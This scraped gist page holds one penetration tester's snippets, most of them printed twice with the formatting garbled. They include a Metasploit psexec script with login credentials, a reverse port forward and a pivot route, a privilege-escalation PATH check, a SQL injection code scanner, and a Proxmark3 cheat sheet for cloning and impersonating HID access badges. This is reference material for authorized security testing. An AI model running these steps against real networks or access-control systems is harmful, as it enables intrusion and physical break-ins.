Joshua Wright joswr1ght

## intermediate-forwarder.met
use exploit/windows/smb/psexec
set RHOST 10.10.10.10
set SMBUSER falken
set SMBPASS joshua
set LHOST tap0
show options
exploit
portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
bg
route add 10.10.10.20/32 1

## iptables-connect-logging.sh
# Create a chain that logs new connections:
iptables -N LOGNEW
iptables -A LOGNEW -j LOG --log-prefix ' INBOUND TCP ' --log-level 4
iptables -A LOGNEW -j ACCEPT
# Accept packets on existing connections without any fuss:
iptables -A INPUT -p tcp -m state \! --state NEW -j ACCEPT
# Log incoming packets on new connections:
iptables -A INPUT -p tcp -j LOGNEW -m limit --limit 100/sec

# Examine logs

## check-privesc-writable-dirs.sh
IFS=:; set -o noglob; for dir in $PATH""; do ls -ld $dir; done

## heinous-shell-sqli-scanner.sh
# This heinous command searches for SQL injection vulnerable code:
# 1. Use awk to convert multiline strings into a single line
# 2. Fix things up with sed to make line endings normal again
# 3. Search for SQL-related statements
# 4. Search for lines where there are two or more $ variable indicators
#
# This is a hack. Please don't let this be my legacy.
#
awk -F"\"" '!$NF{ print; next }{ printf("%s ", $0) }' *.php | sed 's/;/;\n/g;s/}/}\n/g' | grep -iE "select|insert|update|delete" | grep -E "\\$.*\\$"

## extract-tlsscan-hostnames.py
#!/usr/bin/env python3
# Mark Baggett @MarkBaggett graciously wrote this script.
# Minor changes by Joshua Wright @joswr1ght.
# Use it to retrieve host name information from the JSON output of tls-scan
# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
# fields.

import json
import re
import sys

## countips.py
#!/usr/bin/env python
import sys

def countips(netblock):
    cidr = int(netblock.split('/')[1])
    return 2**(32 - cidr)

if (len(sys.argv) != 2):
    print(f"Usage: {sys.argv[0]} <file with CIDR masks>")
    sys.exit(0)

## targetnetworks.txt
15.230.56.104/31
52.93.127.163/32
3.2.0.0/24
15.230.137.0/24
52.4.0.0/14
50.16.0.0/15
52.95.208.0/22
52.93.127.169/32
52.94.244.0/22
64.252.69.0/24

## aws-us-east-1-iplist.sh
wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r | head -3

## aws-iplist-filter-byregion.sh
# This isn't so much of a script as it is a placeholder for something I don't want to forget
wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r

## hid-proxmark-cheat-sheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              5 stars
            
          
                joswr1ght
                / hid-proxmark-cheat-sheet.md
            
            
              Last active
              March 18, 2024 15:22
            
          
    HID/ProxCard Cheat Sheet

Joshua Wright | josh@willhackforsushi.com | DRAFT/Work-in-Progress


Proxmark3 Iceman Edition Command
Function


lf hid read
Read from a nearby HID/ProxCard card


wiegand list
Display a list of supported Wiegand data formats used by HID cards


lf hid sim -r 2006ec0c86
Simulate a HID/ProxCard with the Wiegand value 2006ec0c86; supply the appropriate Wiegand value for the card you wish to impersonate


lf hid sim -w H10301 --fc 118 --cn 16612
Simulate the card number 16612 with facility code 118 using the H10301 (26-bit HID) format (same as the command above but specifying the FC and CN explicitly)
	use exploit/windows/smb/psexec
	set RHOST 10.10.10.10
	set SMBUSER falken
	set SMBPASS joshua
	set LHOST tap0
	show options
	exploit
	portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
	bg
	route add 10.10.10.20/32 1
	# Create a chain that logs new connections:
	iptables -N LOGNEW
	iptables -A LOGNEW -j LOG --log-prefix ' INBOUND TCP ' --log-level 4
	iptables -A LOGNEW -j ACCEPT
	# Accept packets on existing connections without any fuss:
	iptables -A INPUT -p tcp -m state \! --state NEW -j ACCEPT
	# Log incoming packets on new connections:
	iptables -A INPUT -p tcp -j LOGNEW -m limit --limit 100/sec

	# Examine logs
	# This heinous command searches for SQL injection vulnerable code:
	# 1. Use awk to convert multiline strings into a single line
	# 2. Fix things up with sed to make line endings normal again
	# 3. Search for SQL-related statements
	# 4. Search for lines where there are two or more $ variable indicators
	#
	# This is a hack. Please don't let this be my legacy.
	#
	awk -F"\"" '!$NF{ print; next }{ printf("%s ", $0) }' .php \| sed 's/;/;\n/g;s/}/}\n/g' \| grep -iE "select\|insert\|update\|delete" \| grep -E "\\$.\\$"
	#!/usr/bin/env python3
	# Mark Baggett @MarkBaggett graciously wrote this script.
	# Minor changes by Joshua Wright @joswr1ght.
	# Use it to retrieve host name information from the JSON output of tls-scan
	# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
	# fields.

	import json
	import re
	import sys
	#!/usr/bin/env python
	import sys

	def countips(netblock):
	cidr = int(netblock.split('/')[1])
	return 2**(32 - cidr)

	if (len(sys.argv) != 2):
	print(f"Usage: {sys.argv[0]} <file with CIDR masks>")
	sys.exit(0)
	15.230.56.104/31
	52.93.127.163/32
	3.2.0.0/24
	15.230.137.0/24
	52.4.0.0/14
	50.16.0.0/15
	52.95.208.0/22
	52.93.127.169/32
	52.94.244.0/22
	64.252.69.0/24
	# This isn't so much of a script as it is a placeholder for something I don't want to forget
	wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json \| jq '.prefixes[] \| if .region == "us-east-1" then .ip_prefix else empty end' -r
Proxmark3 Iceman Edition Command	Function
`lf hid read`	Read from a nearby HID/ProxCard card
`wiegand list`	Display a list of supported Wiegand data formats used by HID cards
`lf hid sim -r 2006ec0c86`	Simulate a HID/ProxCard with the Wiegand value 2006ec0c86; supply the appropriate Wiegand value for the card you wish to impersonate
`lf hid sim -w H10301 --fc 118 --cn 16612`	Simulate the card number 16612 with facility code 118 using the H10301 (26-bit HID) format (same as the command above but specifying the FC and CN explicitly)